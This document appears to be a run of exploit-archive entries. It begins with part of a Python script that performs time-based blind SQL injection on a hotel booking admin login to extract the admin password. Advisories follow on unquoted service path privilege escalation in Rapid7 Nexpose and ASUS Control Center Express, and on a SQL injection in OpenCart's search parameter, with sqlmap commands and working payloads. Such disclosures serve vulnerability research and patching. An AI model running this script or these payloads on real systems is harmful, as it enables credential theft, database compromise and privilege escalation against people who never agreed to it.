▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██ ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀• Github: https://github.com/offensive-droid {FW} """) # Define the characters to test chars = [ 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '@', '#' ] def sqliPayload(char, position, userid, column, table): sqli = 'admin\' UNION SELECT IF(SUBSTRING(' sqli += str(column) + ',' sqli += str(position) + ',1) = \'' sqli += str(char) + '\',sleep(3),null) FROM ' sqli += str(table) + ' WHERE uname="admin"\'' return sqli def postRequest(URL, sqliReq, char, position): sqliURL = URL params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"} req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10) if req.elapsed.total_seconds() >= 2: print("{} : {}".format(char, req.elapsed.total_seconds())) return char return '' def theHarvester(target, CHARS, url): #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id'])) print("Retrieving admin password".format(target['table'], target['column'], target['id'])) position = 1 full_pass = "" while position < 5: for char in CHARS: sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table']) found_char = postRequest(url, sqliReq, char, position) full_pass += found_char position += 1 return full_pass if __name__ == "__main__": banner() HOST = str(args.url) PATH = HOST + "/hotel booking/admin/login.php" adminPassword = {"id": "1", "table": "manager", "column": "upass"} adminPass = theHarvester(adminPassword, chars, PATH) print("Admin Password:", adminPass)

# Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.rapid7.com/ # Software Link: https://www.rapid7.com/products/nexpose/ # Version: 6.6.240 # Tested: Windows 10 x64 # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem # Service info: C:\Users\saudh>sc qc nexposeconsole [SC] QueryServiceConfig SUCCESS SERVICE_NAME: nexposeconsole TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Nexpose Security Console DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation # Date: 2024-04-02 # Exploit Author: Alaa Kachouh # Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/ # Version: Up to 01.06.15 # Tested on: Windows # CVE: CVE-2024-27673 =================================================================== ASUS Control Center Express Version =< 01.06.15 contains an unquoted service path which allows attackers to escalate privileges to the system level. Assuming attackers have write access to C:\, the attackers can abuse the Asus service "Apro console service"/apro_console.exe which upon restarting will invoke C:\Program.exe with SYSTEM privileges. The binary path of the service alone isn't susceptible, but upon its initiation, it will execute C:\program.exe as SYSTEM. Service Name: AProConsoleService binary impacted: apro_console.exe # If a malicious payload is inserted into C:\ and service is executed in any way, this can grant privileged access to the system and perform malicious activities.

# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://github.com/opencart/opencart/releases # Version: 4.0.2.3 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=product/search&search=test - New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs =========== Output : Parameter: search (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: route=product/search&search=') AND 2427=2427-- drCa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb